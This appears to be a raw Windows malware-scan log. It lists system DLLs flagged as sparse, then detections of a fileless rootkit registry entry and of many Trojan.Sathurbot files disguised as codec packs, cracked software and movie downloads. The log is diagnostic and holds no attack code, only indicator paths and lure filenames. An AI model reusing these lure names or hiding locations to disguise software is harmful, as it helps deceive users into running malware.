File "C:\Windows\System32\HVHOSTSVC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\HVHOSTSVC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\IKEEXT.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\iphlpsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\iphlpsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\irmon.dll" is sparse (flags = 32768)

File "C:\Windows\System32\keyiso.dll" is sparse (flags = 32768)

File "C:\Windows\System32\msdtckrm.dll" is sparse (flags = 32768)

File "C:\Windows\System32\lfsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\lmhsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\MESSAGINGSERVICE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\MESSAGINGSERVICE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\MPSSVC.dll" is sparse (flags = 32768)

File "C:\Windows\System32\iscsiexe.dll" is sparse (flags = 32768)

File "C:\Windows\System32\iscsiexe.dll" is sparse (flags = 32768)

File "C:\Windows\System32\nsisvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\nlasvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\ngcsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\NcaSvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\NCDAUTOSETUP.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\NCDAUTOSETUP.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\NCBSERVICE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\NCBSERVICE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\netlogon.dll" is sparse (flags = 32768)

File "C:\Windows\System32\trkwks.dll" is sparse (flags = 32768)

File "C:\Windows\System32\NETPROFMSVC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\NETPROFMSVC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\NETSETUPSVC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\NETSETUPSVC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\icsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\NGCCTNRSVC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\NGCCTNRSVC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\APHOSTSERVICE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\APHOSTSERVICE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\pcasvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\pcasvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\p2psvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\PHONESERVICE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\PIMINDEXMAINTENANCE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\PIMINDEXMAINTENANCE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\pla.dll" is sparse (flags = 32768)

File "C:\Windows\System32\pnrpauto.dll" is sparse (flags = 32768)

File "C:\Windows\System32\icsvcext.dll" is sparse (flags = 32768)

File "C:\Windows\System32\icsvcext.dll" is sparse (flags = 32768)

File "C:\Windows\System32\IPSECSVC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\rasauto.dll" is sparse (flags = 32768)

File "C:\Windows\System32\rasmans.dll" is sparse (flags = 32768)

File "C:\Windows\System32\mprdim.dll" is sparse (flags = 32768)

File "C:\Windows\System32\regsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\RDXSERVICE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\RDXSERVICE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\RMapi.dll" is sparse (flags = 32768)

File "C:\Windows\System32\schedsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\SCardSvr.dll" is sparse (flags = 32768)

File "C:\Windows\System32\SCardSvr.dll" is sparse (flags = 32768)

File "C:\Windows\System32\XBLGAMESAVE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\XBLGAMESAVE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\SCDEVICEENUM.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\SCDEVICEENUM.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\seclogon.dll" is sparse (flags = 32768)

File "C:\Windows\System32\Sens.dll" is sparse (flags = 32768)

File "C:\Windows\System32\SENSORSERVICE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\SENSORSERVICE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\sensrsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\SessEnv.dll" is sparse (flags = 32768)

File "C:\Windows\System32\shsvcs.dll" is sparse (flags = 32768)

File "C:\Windows\System32\WINDOWS.SHAREDPC.ACCOUNTMANAGER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\WINDOWS.SHAREDPC.ACCOUNTMANAGER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\TILEOBJSERVER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\TILEOBJSERVER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\smphost.dll" is sparse (flags = 32768)

File "C:\Windows\System32\smphost.dll" is sparse (flags = 32768)

File "C:\Windows\System32\SMSROUTERSVC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\SMSROUTERSVC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\StorSvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\sstpsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\ssdpsrv.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wiaservc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\svsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\swprv.dll" is sparse (flags = 32768)

File "C:\Windows\System32\sysmain.dll" is sparse (flags = 32768)

File "C:\Windows\System32\SYSTEMEVENTSBROKERSERVER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\SYSTEMEVENTSBROKERSERVER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\TabSvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\termsrv.dll" is sparse (flags = 32768)

File "C:\Windows\System32\tapisrv.dll" is sparse (flags = 32768)

File "C:\Windows\System32\THEMESERVICE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\THEMESERVICE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\TIMEBROKERSERVER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\TIMEBROKERSERVER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\TZAUTOUPDATE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\umrdp.dll" is sparse (flags = 32768)

File "C:\Windows\System32\Unistore.dll" is sparse (flags = 32768)

File "C:\Windows\System32\USERDATASERVICE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\USERDATASERVICE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\usermgr.dll" is sparse (flags = 32768)

File "C:\Windows\System32\usocore.dll" is sparse (flags = 32768)

File "C:\Windows\System32\vaultsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\w32time.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wbiosrvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wbiosrvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wwansvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\WUDFSvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wlidsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wlidsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wlansvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wcncsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wdi.dll" is sparse (flags = 32768)

File "C:\Windows\System32\WebClnt.dll" is sparse (flags = 32768)

File "C:\Windows\System32\WEPHOSTSVC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\WEPHOSTSVC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\wiarpc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wbem\WMIsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\FLIGHTSETTINGS.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\FLIGHTSETTINGS.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\WORKFOLDERSSVC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\WORKFOLDERSSVC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\WPDBUSENUM.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\WPDBUSENUM.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\WPNSERVICE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\WPNSERVICE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\WPNUSERSERVICE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\WPNUSERSERVICE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\wuaueng.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wuaueng.dll" is sparse (flags = 32768)

File "C:\Windows\System32\XBOXNETAPISVC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\XBOXNETAPISVC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\rundll32.exe" is sparse (flags = 32768)

File "C:\Program Files\Windows Mail\WinMail.exe" is sparse (flags = 32768)

File "C:\Windows\System32\unregmp2.exe" is sparse (flags = 32768)

File "C:\Windows\System32\unregmp2.exe" is sparse (flags = 32768)

File "C:\Windows\System32\ie4uinit.exe" is sparse (flags = 32768)

File "C:\Windows\System32\ie4uinit.exe" is sparse (flags = 32768)

File "C:\Windows\SysWOW64\rundll32.exe" is sparse (flags = 32768)

File "C:\Users\Lac\AppData\Local\Comms\UnistoreDB\store.vol" is sparse (flags = 32768)

File "C:\Windows\System32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat" is sparse (flags = 32768)

File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-3C912894926317713A88D56D53900502B164782D.bin.79" is compressed (flags = 1)

File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-3C912894926317713A88D56D53900502B164782D.bin.79" is compressed (flags = 1)

File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-3C912894926317713A88D56D53900502B164782D.bin.79" is compressed (flags = 1)

File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-3C912894926317713A88D56D53900502B164782D.bin.79" is compressed (flags = 1)

File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-3C912894926317713A88D56D53900502B164782D.bin.7C" is compressed (flags = 1)

File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-3C912894926317713A88D56D53900502B164782D.bin.83" is compressed (flags = 1)

File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-C0A08115E3729326A1D4554F6351C4D1F2BD0C93.bin.79" is compressed (flags = 1)

File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-C0A08115E3729326A1D4554F6351C4D1F2BD0C93.bin.7C" is compressed (flags = 1)

File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-C0A08115E3729326A1D4554F6351C4D1F2BD0C93.bin.83" is compressed (flags = 1)

Infected: HKU\S-1-5-21-971398213-2469251586-1946301387-1001_Classes\f4f58cee\SHELL\OPEN\COMMAND| --> [Rootkit.Fileless.MTGen]

Infected: HKU\S-1-5-21-971398213-2469251586-1946301387-1001_Classes\F4F58CEE\SHELL\OPEN\COMMAND --> [Rootkit.Fileless.MTGen]

Infected: C:\ProgramData\Microsoft\Performance\Monitor --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\752dd3faa0069fa6a98a9172ac529c66 --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\78f85c2db5fe2cf2e6749bbde04ae3b7 --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\d7829581270ee06fb19eced7ca56361d --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\59089003ea871820800f3301d761d960 --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\8913b2aed98d13540ea7a6b4b3e9c39c --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\698b40b1cf28d237be079bdeee463675 --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\92817e3e77145ec7d00c23fd46521e43 --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\978b477f7a38ea51fd369f9f89037116 --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\996d9960b44f265ea9e789832eab461f --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\1889510961d5d0f964e0d1ddd6f333a9 --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\198e5a3fbc946ac7cb0d016adaaf33c9 --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\c4dd58bd85f5169a89ebb47fef97ae09 --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\2a4c75f6738f20a331086e9d552fd36f --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\2bc5732abd484dab03ad771317bac60e --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\34b1d5e7d25d48c7630e0ba41d9b301b --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\358915c23ca7dd8d29c2586bc2f9bb5d --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\37db5be0d4d35939445e87d9d0f890ce --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\4f945ccb2944bc4e607ed26847a5174b --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\4fdbefb5dc0733a6b4dabaaf366227cb --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\51408563b61798158c3c9b122fd24e06 --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\5fc9283d2e7d46535121d14130ddd344 --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\10eaad1570aedd202d35448ce1b6510e --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\10eaad1570aedd202d35448ce1b6510e\Setup.dat --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\10eaad1570aedd202d35448ce1b6510e\Warcraft III The Frozen Throne Patch.exe --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\10eaad1570aedd202d35448ce1b6510e\Warcraft III The Frozen Throne Patch.txt --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\752dd3faa0069fa6a98a9172ac529c66 --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\752dd3faa0069fa6a98a9172ac529c66\Arrow [SE04].txt --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\752dd3faa0069fa6a98a9172ac529c66\Ultra XVid Codec Pack.exe --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\752dd3faa0069fa6a98a9172ac529c66\Video.avi --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\78f85c2db5fe2cf2e6749bbde04ae3b7 --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\78f85c2db5fe2cf2e6749bbde04ae3b7\Max Rose 2013.avi --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\78f85c2db5fe2cf2e6749bbde04ae3b7\Max Rose 2013.txt --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\78f85c2db5fe2cf2e6749bbde04ae3b7\Ultra XVid Codec Pack.exe --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d7829581270ee06fb19eced7ca56361d --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d7829581270ee06fb19eced7ca56361d\Rapid Typing Tutor 5.exe --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d7829581270ee06fb19eced7ca56361d\Rapid Typing Tutor 5.txt --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\59089003ea871820800f3301d761d960 --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\59089003ea871820800f3301d761d960\Allied 2016.avi --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\59089003ea871820800f3301d761d960\Allied 2016.txt --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\59089003ea871820800f3301d761d960\Ultra XVid Codec Pack.exe --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8913b2aed98d13540ea7a6b4b3e9c39c --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8913b2aed98d13540ea7a6b4b3e9c39c\Grand Theft Auto V.exe --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8913b2aed98d13540ea7a6b4b3e9c39c\Grand Theft Auto V.txt --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8913b2aed98d13540ea7a6b4b3e9c39c\Setup.dat --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\698b40b1cf28d237be079bdeee463675 --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\698b40b1cf28d237be079bdeee463675\Miss Sloane 2016.avi --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\698b40b1cf28d237be079bdeee463675\Miss Sloane 2016.txt --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\698b40b1cf28d237be079bdeee463675\Ultra XVid Codec Pack.exe --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\92817e3e77145ec7d00c23fd46521e43 --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\92817e3e77145ec7d00c23fd46521e43\Adobe Photoshop CC 2015.exe --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\92817e3e77145ec7d00c23fd46521e43\Adobe Photoshop CC 2015.txt --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\92817e3e77145ec7d00c23fd46521e43\Setup.dat --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\978b477f7a38ea51fd369f9f89037116 --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\978b477f7a38ea51fd369f9f89037116\Dci 2016 Big Loud.avi --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\978b477f7a38ea51fd369f9f89037116\Dci 2016 Big Loud.txt --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\978b477f7a38ea51fd369f9f89037116\Ultra XVid Codec Pack.exe --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\996d9960b44f265ea9e789832eab461f --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\996d9960b44f265ea9e789832eab461f\Befikre 2016.avi --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\996d9960b44f265ea9e789832eab461f\Befikre 2016.txt --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\996d9960b44f265ea9e789832eab461f\Ultra XVid Codec Pack.exe --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\1889510961d5d0f964e0d1ddd6f333a9 --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\1889510961d5d0f964e0d1ddd6f333a9\Kung Fu Panda 3.avi --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\1889510961d5d0f964e0d1ddd6f333a9\Kung Fu Panda 3.txt --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\1889510961d5d0f964e0d1ddd6f333a9\Ultra XVid Codec Pack.exe --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\198e5a3fbc946ac7cb0d016adaaf33c9 --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\198e5a3fbc946ac7cb0d016adaaf33c9\In Dubious Battle 2016.avi --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\198e5a3fbc946ac7cb0d016adaaf33c9\In Dubious Battle 2016.txt --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\198e5a3fbc946ac7cb0d016adaaf33c9\Ultra XVid Codec Pack.exe --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c4dd58bd85f5169a89ebb47fef97ae09 --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c4dd58bd85f5169a89ebb47fef97ae09\The Conjuring 2.avi --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c4dd58bd85f5169a89ebb47fef97ae09\The Conjuring 2.txt --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c4dd58bd85f5169a89ebb47fef97ae09\Ultra XVid Codec Pack.exe --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2a4c75f6738f20a331086e9d552fd36f --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2a4c75f6738f20a331086e9d552fd36f\Sully 2016.avi --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2a4c75f6738f20a331086e9d552fd36f\Sully 2016.txt --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2a4c75f6738f20a331086e9d552fd36f\Ultra XVid Codec Pack.exe --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2bc5732abd484dab03ad771317bac60e --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2bc5732abd484dab03ad771317bac60e\Bounty Hunters 2016.avi --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2bc5732abd484dab03ad771317bac60e\Bounty Hunters 2016.txt --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2bc5732abd484dab03ad771317bac60e\Ultra XVid Codec Pack.exe --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\34b1d5e7d25d48c7630e0ba41d9b301b --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\34b1d5e7d25d48c7630e0ba41d9b301b\KMSpico 10.2.exe --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\34b1d5e7d25d48c7630e0ba41d9b301b\KMSpico 10.2.txt --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\358915c23ca7dd8d29c2586bc2f9bb5d --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\358915c23ca7dd8d29c2586bc2f9bb5d\Godzilla Resurgence 2016.avi --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\358915c23ca7dd8d29c2586bc2f9bb5d\Godzilla Resurgence 2016.txt --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\358915c23ca7dd8d29c2586bc2f9bb5d\Ultra XVid Codec Pack.exe --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\37db5be0d4d35939445e87d9d0f890ce --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\37db5be0d4d35939445e87d9d0f890ce\Petes Dragon 2016.avi --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\37db5be0d4d35939445e87d9d0f890ce\Petes Dragon 2016.txt --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\37db5be0d4d35939445e87d9d0f890ce\Ultra XVid Codec Pack.exe --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4f945ccb2944bc4e607ed26847a5174b --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4f945ccb2944bc4e607ed26847a5174b\My Blind Brother 2016.avi --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4f945ccb2944bc4e607ed26847a5174b\My Blind Brother 2016.txt --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4f945ccb2944bc4e607ed26847a5174b\Ultra XVid Codec Pack.exe --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4fdbefb5dc0733a6b4dabaaf366227cb --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4fdbefb5dc0733a6b4dabaaf366227cb\This Is Us [SE01].txt --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4fdbefb5dc0733a6b4dabaaf366227cb\Ultra XVid Codec Pack.exe --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4fdbefb5dc0733a6b4dabaaf366227cb\Video.avi --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\51408563b61798158c3c9b122fd24e06 --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\51408563b61798158c3c9b122fd24e06\Nuance Dragon NaturallySpeaking 13.exe --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\51408563b61798158c3c9b122fd24e06\Nuance Dragon NaturallySpeaking 13.txt --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\51408563b61798158c3c9b122fd24e06\Setup.dat --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\5fc9283d2e7d46535121d14130ddd344 --> [Trojan.Sathurbot.E]

